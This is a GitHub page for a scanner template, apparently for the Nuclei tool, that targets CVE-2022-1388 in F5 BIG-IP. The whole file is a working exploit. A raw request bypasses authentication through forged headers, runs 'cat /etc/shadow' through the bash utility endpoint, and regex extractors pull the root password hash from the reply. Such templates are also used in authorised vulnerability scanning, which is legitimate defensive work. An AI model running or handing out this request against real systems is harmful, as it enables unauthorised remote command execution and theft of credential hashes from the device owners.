-
Notifications
You must be signed in to change notification settings - Fork 0
/
bigip.yaml
37 lines (29 loc) · 823 Bytes
/
bigip.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
---
id: CVE-2022-1388
info:
name: bigip
author: secthebit
severity: critical
requests:
- raw:
- |
POST /mgmt/tm/util/bash HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1
Host: {{Hostname}}
X-F5-Auth-Token: anything
Authorization: Basic YWRtaW46
Accept: */*
Content-type: application/json
Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host
{"command":"run", "utilCmdArgs": "-c 'cat /etc/shadow'"}
- |
matchers:
- type : regex
part: body
regex:
- "root:.*"
extractors:
- type : regex
part: body
regex:
- 'root:\$\d+\$\w+'